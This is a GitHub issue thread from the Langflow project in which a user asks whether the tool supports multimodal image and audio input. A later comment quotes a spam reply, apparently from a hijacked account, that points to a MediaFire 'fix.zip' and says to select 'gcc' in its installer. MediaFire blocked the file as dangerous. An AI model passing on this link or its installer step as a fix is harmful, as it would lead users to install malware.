### ISSUE TITLE
multimodality

### ISSUE THREAD

**Issue by zhengqianhe0** [langflow-ai/langflow#3528]
### Bug Description

I found that all input and output before langflow are text. I would like to know if there is currently a function to upload and parse images? This refers to multimodality, which means directly understanding the content of images or audio/video, rather than extracting text from images and processing it with large models. Does the current version 1.0.16 have this feature? Do you have any plans to integrate multimodal large models?

### Reproduction

I found that all input and output before langflow are text. I would like to know if there is currently a function to upload and parse images? This refers to multimodality, which means directly understanding the content of images or audio/video, rather than extracting text from images and processing it with large models. Does the current version 1.0.16 have this feature? Do you have any plans to integrate multimodal large models?

### Expected behavior

I found that all input and output before langflow are text. I would like to know if there is currently a function to upload and parse images? This refers to multimodality, which means directly understanding the content of images or audio/video, rather than extracting text from images and processing it with large models. Does the current version 1.0.16 have this feature? Do you have any plans to integrate multimodal large models?

### Operating System

windows 10

### Langflow Version

1.0.15

### Python Version

None

**Comment by zhengqianhe0** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

it reminds me "Dangerous File Blocked
The file you attempted to download was determined to be dangerous. For your protection, MediaFire does not enable distribution of dangerous files."

**Comment by zhengqianhe0** [comment]
> My account has been stolen and they are sending junk emails or links all over the place. I've changed my password. I'm sorry for what you've received. 1propanol
thx， so what should I do to use  multi-modal performance of Langflow? btw we have the same last name in Chinese lol

**Comment by carlosrcoelho** [comment]
#3530
